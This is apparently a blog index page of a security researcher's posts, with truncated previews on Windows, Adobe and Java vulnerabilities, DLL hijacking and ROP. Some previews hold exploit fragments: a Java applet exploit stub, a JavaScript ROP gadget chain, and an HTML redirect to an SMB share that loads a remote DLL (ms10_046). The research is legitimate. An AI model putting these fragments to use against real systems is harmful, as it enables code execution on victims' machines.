原创 HP_imc 5.1_E0202 imf.dll recv packets integer overflow

imf.dll 版本 HP_iMC_PLAT_5.1_E0202_Standard_Windows_HP_iMC_PLAT_5.1_E0202_Standard_Windows漏洞彙編代碼：.text:003B4083          

2020-02-23 23:52:46

原创 看adobe sandbox的一點想法

  adobe pdf的sandbox貌似是不會限制socket的，某技術paper上面說的 這樣感覺可以利用第三方程序的本地socket的漏洞來繞過sandbox。 例如某某播放軟件本地開了一個127.0.0.1的鏈接，存在溢出漏洞

2020-02-23 23:52:46

原创 codeblocks ide for linux

我擦  經yourstar推薦 linux下的codeblocks果然是一個很好的ide 開發工具啊 之前寫代碼一直是用gtext，自己寫makefile 那個糾結。。。。 ubuntu下安裝codeblocks sudo ap

2020-02-23 23:52:46

原创 Cve2012-0507 簡單分析

Cve2012-0507分析   影響版本 Jre update 30 before     觸發漏洞代碼   public class Exploit extends Applet {   publicvoid init()   {  

2020-02-23 23:52:46

原创 CVE-2011-2448 Adobe ShockwaveDirector File Parsing data of rcsl chunk multiple DOS vulnerabilities

Adobe Shockwave Player Director File Parsing data of rcsl chunk multiple DOS vulnerabilities CAL_ID: CAL-2011-0054 CVE

2020-02-23 23:52:46

原创 ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability

/* Exploit Title: ALLPlayerEN 5.0 ehtrace.dll dll hijack Vulnerability Date: 2012-3-25 Author: instruder Software Li

2020-02-23 23:52:46

原创 CVE-2013-0636

http://www.adobe.com/support/security/bulletins/apsb13-06.html

2018-08-28 02:37:19

原创 openjdk windows 編譯

前記   如果你不是閒着蛋疼最好不要在windows上面編譯，linux上面一會就編譯好了。。。。可是windows上面  只想說10個字“尼瑪”   出現問題了  可以直接改他的makefile和gmk 爺爺的 例如那個verify.r

2018-08-28 02:37:19 2

原创 Well-known DEP-violating thunks

這幾天調試發現一個奇怪的現象，一個在數據區段執行的指令，在開啓了系統dep時 竟然還可以繼續執行，換成其他指令就不可以，而且執行時這個內存屬性仍舊是不可 執行屬性。同時按理指令是一條一條執行，但是這個指令

2018-08-28 02:37:19

原创 MSVCRT:ROP - CN 修改ROP檢測標誌

function getddd() { var kkkkk = unescape("\u0433\u77bf"); kkkkk +=unescape("\u5ed5\u77be"); //xchg eax,esp retn

2018-08-28 02:37:19

原创 權限提升

普通權限在不需要任何驗證即啓動了一個高級別權限的進程 本身就存在了很大的風險。 權限存在交互 就很容易導致問題

2018-08-28 02:37:19 3

原创 ms10_046_shortcut_icon_dllloader 這個其實很好用

<html><head><meta http-equiv="refresh" content="0;URL=\\192.168.1.105\tKVOwIzRc\"></head><body></body></html>

2018-08-28 02:37:19 7

原创 cve2012-1876 leak mshtml base address and leak shellcode base address

leak mshtml base address  leak shellcode base address 其中leak shellcode base 思路是聯合 http://www.vupen.com/blog/2

2018-08-28 02:37:19

原创 當前多數殺軟主防存在的缺陷

見 鏈接   http://www.binvul.com/viewthread.php?tid=240&extra=page%3D1 

2018-08-28 02:37:19

原创 亂猜

http://bbs.360safe.com/thread-111959-1-1.html iocode 0x222020  .text:000110C6 ; int __stdcall sub_110C6(int processi

2018-08-28 02:37:18